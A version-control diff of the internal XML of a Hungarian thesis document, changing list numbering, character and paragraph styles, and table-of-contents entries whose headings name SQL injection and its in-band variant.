+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="040E0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2007" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="040E0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2727" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="040E0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3447" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="040E0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4167" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="040E0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4887" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="040E0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5607" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="040E0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6327" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="040E0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="7047" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
@@ -5194,6 +8374,9 @@
   </w:num>
   <w:num w:numId="9">
     <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="10">
+    <w:abstractNumId w:val="9"/>
   </w:num>
 </w:numbering>
 </file>
@@ -5673,7 +8856,6 @@
   <w:style w:type="character" w:default="1" w:styleId="Bekezdsalapbettpusa">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="Normltblzat">
@@ -6248,6 +9430,125 @@
       <w:lang w:val="en-US" w:eastAsia="hu-HU"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="character" w:styleId="HTML-kd">
+    <w:name w:val="HTML Code"/>
+    <w:basedOn w:val="Bekezdsalapbettpusa"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="002D1B0D"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="sqlkeywordcolor">
+    <w:name w:val="sqlkeywordcolor"/>
+    <w:basedOn w:val="Bekezdsalapbettpusa"/>
+    <w:rsid w:val="00EA7C60"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="sqlnumbercolor">
+    <w:name w:val="sqlnumbercolor"/>
+    <w:basedOn w:val="Bekezdsalapbettpusa"/>
+    <w:rsid w:val="00EA7C60"/>
+  </w:style>
+  <w:style w:type="character" w:styleId="Feloldatlanmegemlts">
+    <w:name w:val="Unresolved Mention"/>
+    <w:basedOn w:val="Bekezdsalapbettpusa"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00447EB6"/>
+    <w:rPr>
+      <w:color w:val="605E5C"/>
+      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Lbjegyzetszveg">
+    <w:name w:val="footnote text"/>
+    <w:basedOn w:val="Norml"/>
+    <w:link w:val="LbjegyzetszvegChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00D7139A"/>
+    <w:rPr>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="LbjegyzetszvegChar">
+    <w:name w:val="Lábjegyzetszöveg Char"/>
+    <w:basedOn w:val="Bekezdsalapbettpusa"/>
+    <w:link w:val="Lbjegyzetszveg"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00D7139A"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+      <w:lang w:val="en-US" w:eastAsia="hu-HU"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Lbjegyzet-hivatkozs">
+    <w:name w:val="footnote reference"/>
+    <w:basedOn w:val="Bekezdsalapbettpusa"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00D7139A"/>
+    <w:rPr>
+      <w:vertAlign w:val="superscript"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Sorszma">
+    <w:name w:val="line number"/>
+    <w:basedOn w:val="Bekezdsalapbettpusa"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="003A3649"/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Kpalrs">
+    <w:name w:val="caption"/>
+    <w:basedOn w:val="Norml"/>
+    <w:next w:val="Norml"/>
+    <w:uiPriority w:val="35"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00425034"/>
+    <w:pPr>
+      <w:spacing w:after="200"/>
+    </w:pPr>
+    <w:rPr>
+      <w:i/>
+      <w:iCs/>
+      <w:color w:val="44546A" w:themeColor="text2"/>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="table" w:styleId="Rcsostblzat">
+    <w:name w:val="Table Grid"/>
+    <w:basedOn w:val="Normltblzat"/>
+    <w:uiPriority w:val="39"/>
+    <w:rsid w:val="00CF142E"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:tblPr>
+      <w:tblBorders>
+        <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+      </w:tblBorders>
+    </w:tblPr>
+  </w:style>
 </w:styles>
 </file>
 

--- a/szakdolgozat.docx
+++ b/szakdolgozat.docx
@@ -660,7 +660,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc70610870"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc70961896"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -739,7 +739,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc70610871"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc70961897"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1436,6 +1436,7 @@
           <w:docPartUnique/>
         </w:docPartObj>
       </w:sdtPr>
+      <w:sdtEndPr/>
       <w:sdtContent>
         <w:p>
           <w:pPr>
@@ -1456,7 +1457,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:bookmarkStart w:id="4" w:name="_Toc70610872"/>
+          <w:bookmarkStart w:id="4" w:name="_Toc70961898"/>
           <w:r>
             <w:rPr>
               <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1482,8 +1483,10 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
@@ -1507,45 +1510,46 @@
             </w:rPr>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc70610870" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961896" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
                 <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>Feladatkiírás</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610870 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961896 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -1553,14 +1557,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1572,52 +1575,55 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610871" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961897" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
                 <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>Tartalmi összefoglaló</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610871 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961897 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -1625,14 +1631,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>3</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1644,52 +1649,55 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610872" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961898" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
                 <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>Tartalomjegyzék</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610872 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961898 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -1697,14 +1705,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>4</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1716,52 +1723,55 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610873" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961899" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
                 <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>BEVEZETÉS</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610873 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961899 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -1769,14 +1779,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>5</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1789,24 +1798,27 @@
               <w:tab w:val="left" w:pos="660"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610874" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961900" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>1.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
                 <w:lang w:val="hu-HU"/>
@@ -1816,41 +1828,41 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>SQL INJECTION</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610874 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961900 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -1858,14 +1870,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1878,17 +1889,20 @@
               <w:tab w:val="left" w:pos="880"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610875" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961901" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
                 <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>1.1.</w:t>
@@ -1896,6 +1910,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
                 <w:lang w:val="hu-HU"/>
@@ -1905,41 +1920,42 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
                 <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>Típusai</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610875 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961901 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -1947,14 +1963,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1967,24 +1982,27 @@
               <w:tab w:val="left" w:pos="1320"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610876" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961902" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>1.1.1.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
                 <w:lang w:val="hu-HU"/>
@@ -1994,41 +2012,41 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>Sávon belüli (in-band, classic) SQLi</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610876 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961902 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
